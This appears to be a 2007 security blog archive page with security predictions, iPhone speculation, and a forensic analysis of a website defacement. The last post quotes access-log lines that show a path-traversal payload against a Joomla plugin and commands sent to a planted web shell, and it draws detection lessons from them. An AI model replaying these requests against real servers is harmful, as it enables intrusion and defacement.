January 2007 Archives
Finally … the wait is over. In a few short seconds, my security predictions will be unleashed onto the world.
Unlike last year, I won’t muddy the waters with scores and ratings, but will just say it: predicting is easy if you go for the obvious trends that everybody sees (”hackers will hack, phishers will phish, spammers will spam, bot herders will bot herd, other criminals will, eh, do crimes!” and - yes! - both bad and good stuff will happen in ample quantities). Last year I erred on the side of caution and got every single prediction right. Promise I will be more aggressive - and thus more fun - this time :-)
I. Platforms: Vista will have no impact on the overall risk level of most organizations out there. Yes, some holes will certainly be plugged (and I even agree that “Vista is the most secure version ever”, just like every single one of its predecessors was - in its time), but others - possibly of types we don’t even know about - will crop up. Sorry, but secure platform =/= secure Internet (kinda like you wearing a Kevlar vest doesn’t lower crime in the neighborhood).
II. New technologies: no credible technology that can alone “solve” the problem of insider threat will emerge (many will try); the insider threat problem is just too broad, diverse and rich to be solved by a single technology or even a single vendor (corollary: if somebody is trying to sell you such a technology that claims to do exactly that on its own, then - well, you know what to do …)
III. Security market: we will see more than a few firesales and possibly total and miserable security vendor failures (wonna bet which legacy SIEM vendor will die first? :-)) There are way too many companies who sell some random and often irrelevant “protection” which sometimes doesn’t even work … at their own demo … when their CTO demos it … the third time …
IV. Risk management: a confusion about what is “risk management” will not subside this year. Business risk? Information risk? Risk as threat x vulnerability x asset? Risk as probability of loss? Arrrghh! - It goes on and on and on. No standard accepted definition of risk management in the field of infosec will emerge.
V. NAC: of course, no list of 2007 prediction is valid without mentioning knack :-) And you know what? NAC will shrink, NOT grow in importance this year! This is where the rubber meets the road and fish start to swim upstream :-) - this prediction started from me reading Richard’s piece “NAC is Fighting the Last War” which struck me like a Strength 15 Lighting Bolt. Indeed, narrowly defined NAC largely targets worm infections (and will thus lose relevance) while broadly defined NAC starts to sound like having a well-run network (which is as relevant today as it was in 1992 and probably 2012 as well). The Planet NAC is about to experience a premature eclipse :-)
VI. 0-days: 2006 was the year when this previously obscure term fell victim to malignant marketEErs. 2007 will see more of the same, no doubt. But what about the real 0-day-wielding attackers, poking jokes at the above “oh-day defenders”? Security research into new types of vulnerabilities will certainly continue and more types of previously “safe” (rather, “erroneously thought of as safe”) types of content will be used to attack applications. MPG with 0day? AVI with 0day? And, our old friends doc, xls, ppt and now PDF. On the other hand, a major 0-day worm still won’t happen.
VII. IP and ID theft, data loss: at the risk of sounding hilariously obvious, I would state that such incidents of ID theft (phishing, etc), broader intellectual property (IP) theft and loss will continue largely unabated. Will we, the security community, try to stop it? Of course, but nowhere near hard enough …
VIII. Compliance: but of course! Did you think I’d miss this bad boy? Mandatory regulatory initiatives that pack a bite or a punch, such as PCI, will continue to spread and thus grow in importance, while jokes like HIPAA will continue to languish, helping my # VII prediction come true with a bang … At the same time, I am undecided on the voluntary frameworks that you can choose to comply with (ISO17799/270001, COBIT, ITIL, etc) - will they take off like a rocketship or remain steadily interesting to some? Only time will tell.
IX. Security awareness: well, security awareness will … ah, come on, just laugh: bua-ha-ha-ha-haaa :-)
X. Finally, I would like to reiterate a few of the last year’s predictions that will still ring true this year. Client-side and application-level (especially, web application) vulnerabilities will still be outrunning the server-side and platform-level ones. Major wireless attacks and malware will still not destroy the world.
So, there you have it! Enjoy, comment, slam, compliment, etc! And remember - just as one cannot predict the threats of tomorrow today, one still won’t be able to do in 200X. And in 20XY :-) And - but I am going out on a limb here - in 2XYZ! :-)
All predictions for 2007 that I’ve seen are tagged here.
I don’t jump on over-crowded bandwagons very often; because everyone out there has thrown out their view on what the unseen iPhone will be like. I’ll admit that there is one aspect of the iPhone that I’m curious about, but nobody seems to have commented on.
If you run OS X, you have the Address Book application, iChat, and iSync. All of these programs perform some form of contact management and centralization of information. If you run Windows, you have a few PIM applications to choose from, but there’s nothing that really stands out as the end-all, be-all contact manager.
If there really is an iPhone, I’m guessing that it will also come bundled with a really good phone management application. It will provide contact management and syncing, management of other information such as images, ring tones, application settings. It might also provide the ability to control the phone directly from the computer. Whatever this application is, it will be released for both the Macintosh and Windows environments. Very few of the current cell phones come with syncing applications, so this would set them apart from everyone else in the market.
If the phone comes with a camera, and an iPod 30 pin connector, then you open the door to having a usable web camera for video conferencing applications like iChat. That prediction might be a bit of a stretch, but I’d have a hard time imagining that nobody at Apple has never considered the idea of soft phone applications while designing a hardware phone.
That’s all the insight I have at the moment. I guess I’ll know for sure in a few hours.
- - [21/Dec/2006:23:23:15 +0200] "GET /index2.php?act=img&img=ext_cache_94afbfb2f291e0bf253fcf222e9d238e_87b12a3d14f4b97bc1b3cb0ea59fc67a HTTP/1.0" 404 454 "http://www.zone-h.org/index2.php?option=com_jce&no_html=1&task=plugin&plugin=..<>/<...<!--//..<////..<////..<////..<////images/stories/food/x &file=defi1_eng.php.wmv&act=ls&d=/var/www/cache/&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
as well as
- - [21/Dec/2006:23:23:59 +0200] "GET /index2.php?option=com_jce&no_html=1&task=plugin&plugin=..<>/<...<!--//.. <////..<////..<////..<////images/stories/food/x&file=defi1_eng.php.wmv &act=ls&d=/var/www/cache/cacha/&sort=0a HTTP/1.0" 200 3411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)" 220.127.116.11 - - [21/Dec/2006:23:25:03 +0200] "GET /cache/cacha/020.php HTTP/1.0" 200 4512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
(note the web server response codes in bold)
This is another fun log line from the incident account that has some lessons-learned value as well - it has a 200 code on a script that you (the web server admin) didn’t deploy (see bold)…
- - [22/Dec/2006:01:05:15 +0200] "POST /cache/cacha/020.php?act=f&f=configuration.php&ft=edit&d=%2Fvar%2Fwww%2F HTTP/1.0" 200 4781 "http://www.zone-h.org/cache/cacha/020.php?act=f&f=configuration.php&ft=edit&d=%2Fvar%2Fwww%2F" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:18.104.22.168) Gecko/20061206 Firefox/22.214.171.124"
So, what do we learn from this incident log analysis:
1. Look for weird commands (those containing “.<!–//..<” certainly qualify) with 200 HTTP response codes
2. Look for executable files you didn’t put on your server with 200 response codes
3. Don’t let your defacement mirror to be defaced :-)